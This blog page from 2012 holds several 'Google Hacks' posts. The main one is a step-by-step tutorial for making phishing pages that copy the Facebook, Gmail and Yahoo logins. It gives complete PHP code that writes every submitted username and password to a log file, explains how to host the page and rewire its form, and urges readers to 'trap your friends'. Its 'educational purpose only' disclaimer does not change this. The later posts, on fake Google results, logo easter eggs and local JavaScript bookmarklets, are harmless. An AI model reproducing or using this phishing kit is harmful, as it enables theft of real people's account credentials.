Showing posts with label Google Hacks. Show all posts
Showing posts with label Google Hacks. Show all posts

Tuesday, September 4, 2012

How To Create Phishing Page For Facebook, Gmail, Yahoo


What is phishing?
The method in which the user receives a message with a link directing them to a fake phishing website which has the same look and feel as the legitimate website. If the user doesn’t look at the URL, it may be hard to tell the difference between the fake and legitimate websites. Then, the user is asked to provide personal information on the page for example username and password.
How to create Phishing Page For Facebook, Gmail, Yahoo :

1) Requirements :
(a) Fake Login Page
(b) getLoginDetails Page
(c) Free Web Hosting Account
2) How To Create Fake Login Page :
a) Open the www.facebook.com/login.php or login page for which you want to create a phishing page.
b) Save the page on desktop as .html
phishing page


3) How to create getLoginDetail page :
a) Open the notepad and paste the following code.
<?php
header ('Location: http://techehub.blogspot.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
b) 2nd line i.e. “Location” is that where you want to redirect your victim. If you want to redirect it to facebook  then change it to “https://www.facebook.com/login.php?login_attempt=1” 
c) Save the file as getLoginDetails.php 
4) Free Web Hosting : 
a) You have to upload these two pages to a free web hosting site. I recommend to use 000webhost as it is free and also supports the php files.
b) Login to your account and choose file manager to upload file. 
c) Upload pages under the public_html dir
d) After uploading these two page you will get the url for those page. It looks something like www.your-website-name.net63.net/login and www.your-website-name.net63.net/getLoginDetails.php
5) Final step :
a) Open the login.html(uploaded in 000webhost) in notepad.
b) Find the string “action”(using ctrl+f), you will see something like action=https://www.facebook.com/login.php?login_attempt=1
c) Replace the https://www.facebook.com/login.php?login_attempt=1  with your getloginDetail page url like www.your-website-name.net63.net/getloginDetails.php and save the page.
d) Now open the www.your-website-name.net63.net/login, it look like a real facebook login page. Enter the username and password and you will notice that a log.txt file is created in your webhosting account. It contain the username and password.
e) Use this link to trap your friends and get their username and password. Thats it. Done !
Note : Hacking is a crime. Do not use this tutorial to hack innocent people. I am sharing this tutorial for educational purpose only. I will not responsible for any damage done by you. 

Sunday, August 19, 2012

How to get google to display Did you mean : [your name]


If you are searching something on Google and by mistake you mistyped, then  Google shows you did you mean : [correct keyword or phrase]. One day while surfing on internet I was wondered by seeing a photo,  uploaded by my friend. In that photo he searched phrase “greatest superstar of India” on Google and Google shows results as “did you mean : [his Name]”. So I tried to figure out how he did that. You want to know how to do this, lets do it.

How to Get Google to Display “Did you mean : [your name]”


google did you mean
 1) There is a dummy website in which you have to put your phrase and it shows results very similar to Google result page.
2) Go to : Gooogle
3) You have to Fill three fields
Your Search : Type what  you want seen in the URL of the page like (e.g. Best cs1.6 gamer in the world)
Did you mean : type what you want to appear in the “did you mean” part(e.g. Your name)
 Highlight : type what you want to be highlighted
google did you mean your name
 4) Now click on Gooogle button, then it shows three different options to share your page. To see result page, just click on image below option no 3.
google did you know name
 5) When you click on image, it shows result page which looks very similar to that of Google when it shows "Did you mean".
6) When you select first option, it add a image to your favorite social network or you can go for option no three--> print screen--> paste in paint--> crop --> upload. See how many like you will get or how your friends comment on your photo. Just For Fun !

Saturday, June 30, 2012

Google logo trick

  • Google Style Name :

You can put your name on Google search engine.http://www.buzzisearch.com/ is a site where you can put your name on search engine. Buzzisearch search is not a part of google.com. It use Google custom search to show the search results. Enter your name in search box and choose google style.
  •   Google loco :
  1. Enter "google loco" in google search and click on I'm Feeling Lucky.
  2. You will see "Google loco" moving.
  •  Google Gothic :
  1. Enter "google gothic" in google search and click on I'm Feeling Lucky. 
  2. You will see "Google Gothic" theme.
  3. Also try "google gothic 2" and click on I'm Feeling Lucky.



Friday, June 29, 2012

Cool javaScript tricks


Today, I will list some very cool JavaScript hacks and tricks that you can use creatively or just have plain fun. To make each one of these codes work, all you have to do is copy and paste it into the address bar of your browser window and hit “Enter”. So here they are :

  • Edit any page/website in real-time :
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 
  • This piece of code pulls off all the images from your web page and rotates them in a circle. Really makes any page go naked (without its images). The best place to test is a website with many images. (Google Images for an example) 
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0); 
  • The Calculator : In case you are not in a mood to use the standard windows calculator and want your browser to do the dirty job for you, use this code.
javascript: alert(34343+3434-222);

You can change the numbers according to your choice and also try creative complex equations. Just put your arithmetic into javascript: alert( );
  • I have used Edit script on my google page and save it. Now when I open my firefox browser it shows image like above.